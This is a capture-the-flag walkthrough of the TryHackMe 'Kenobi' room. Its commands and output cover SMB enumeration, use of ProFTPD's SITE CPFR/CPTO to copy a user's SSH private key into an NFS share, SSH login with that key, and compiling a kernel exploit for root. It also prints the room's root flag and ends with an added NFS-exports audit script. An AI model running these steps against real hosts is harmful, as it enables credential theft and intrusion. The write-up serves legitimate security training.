Room Link : https://tryhackme.com/r/room/kenobi

STEP1
nmap 10.10.170.101

FINDING
21/tcp    open  ftp         ProFTPD 1.3.5
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp  open  nfs         2-4 (RPC #100003)
35285/tcp open  mountd      1-3 (RPC #100005)
39595/tcp open  mountd      1-3 (RPC #100005)
46411/tcp open  nlockmgr    1-4 (RPC #100021)
47473/tcp open  mountd      1-3 (RPC #100005)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

-----------------------------------------------------------------------------------------------------
STEP2
smbclient -L \\\\10.10.170.101\\
-- blank password

FINDING
Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
anonymous       Disk
IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))

-----------------------------------------------------------------------------------------------------
STEP3
smbclient //10.10.170.101/anonymous
-- blank password
dir

FINDING
log.txt    N    12237    Wed Sep  4 06:49:09 2019

-----------------------------------------------------------------------------------------------------
STEP4
mget log.txt
-- to download the file

FINDING (contents of log.txt)
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory /home/kenobi/.ssh.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.

-----------------------------------------------------------------------------------------------------
STEP5
showmount -e 10.10.170.101
-- because the NFS ports are open (111/tcp rpcbind, 2049/tcp nfs), the server may export a folder we can mount

FINDING
/var *

-----------------------------------------------------------------------------------------------------
STEP6
mkdir /tmp/mount
mount -o rw,vers=3 10.10.170.101:/var /tmp/mount

-----------------------------------------------------------------------------------------------------
STEP7
we need to copy id_rsa FROM /home/kenobi/.ssh/id_rsa TO /var/tmp/
-- because /var is exported over NFS (111/tcp rpcbind and 2049/tcp nfs are open) and log.txt gives the key path /home/kenobi/.ssh/id_rsa

-----------------------------------------------------------------------------------------------------
STEP8
nc 10.10.170.101 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
-- copies the key into /var/tmp, which is inside the mounted folder

FINDING
250 Copy successful

-----------------------------------------------------------------------------------------------------
STEP9
cd /tmp/mount
ls -la
cd tmp
ls -la
cp id_rsa /root/Desktop/id_rsa
chmod 600 id_rsa
cd /root/Desktop

-----------------------------------------------------------------------------------------------------
STEP10
ssh kenobi@10.10.170.101 -i id_rsa
cd /tmp
uname -r

FINDING
4.8.0-58-generic
https://www.exploit-db.com/exploits/45010

-----------------------------------------------------------------------------------------------------
STEP11
vim 45010
-- paste the exploit code into this file and save it

-----------------------------------------------------------------------------------------------------
STEP12
cp 45010 45010.c
gcc 45010.c -o exploit.c -pthread
chmod +x exploit.c
./exploit.c
whoami
root
cd /root
ls
cat root.txt
177b3cd8562289f37382721c28381f02
-----------------------------------------------------------------------------------------------------
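Added example, not part of the room or this write-up: a small POSIX sh audit of an NFS exports file for the export pattern that STEP5 and STEP6 depend on (/var exported to every host, with no_root_squash). The paths, hosts and option lines in the sample file are constructed.

```shell
#!/bin/sh
# Added example, not from the room or this write-up: audit an NFS exports file
# for the export pattern abused above (/var exported to every host). All
# paths, hosts and options in the sample data below are constructed.
# audit_exports FILE
# Prints one line per risky entry: "<path> <client>(<opts>) <reasons>".
# Flagged: client "*" (or no client at all, which NFS treats as every host)
# and the no_root_squash option. Comments and blank lines are ignored.
audit_exports() {
    sed 's/#.*//' "$1" | tr -s ' \t' ' ' | sed 's/^ //; s/ $//' | grep -v '^$' |
    while IFS= read -r line; do
        set -f   # no globbing: a spec such as "*(rw)" must stay literal
        path="${line%% *}"
        case "$line" in
            *' '*) rest="${line#* }" ;;
            *)     rest='*' ;;   # no client list: exported to everyone
        esac
        for spec in $rest; do
            client="${spec%%\(*}"
            case "$spec" in
                *'('*) opts="${spec#*\(}"; opts="${opts%\)}" ;;
                *)     opts='' ;;
            esac
            reasons=''
            if [ "$client" = '*' ]; then reasons='world-exported'; fi
            case ",$opts," in
                *,no_root_squash,*) reasons="${reasons:+$reasons }no_root_squash" ;;
            esac
            if [ -n "$reasons" ]; then
                printf '%s %s(%s) %s\n' "$path" "$client" "$opts" "$reasons"
            fi
        done
    done
}
# risky_export_count FILE: number of flagged entries, as a plain integer.
risky_export_count() {
    audit_exports "$1" | wc -l | tr -d ' '
}
# Constructed sample: the first line mirrors the export seen in the room
# (/var to every host, read-write); the rest are safer variants.
SAMPLE_EXPORTS="${TMPDIR:-/tmp}/exports.sample.$$"
cat > "$SAMPLE_EXPORTS" <<'EOF'
# constructed /etc/exports
/var *(rw,sync,insecure,no_subtree_check,no_root_squash)
/srv/share 10.10.0.0/16(ro,sync,no_subtree_check)
/home/backup 10.10.1.5(rw,sync,root_squash)
/export/pub *(ro,sync,root_squash)
EOF
audit_exports "$SAMPLE_EXPORTS"
```

Run against a real /etc/exports the script flags the /var line exactly as this box exports it; a read-only world export is still reported, since any host can then read whatever lands in the share.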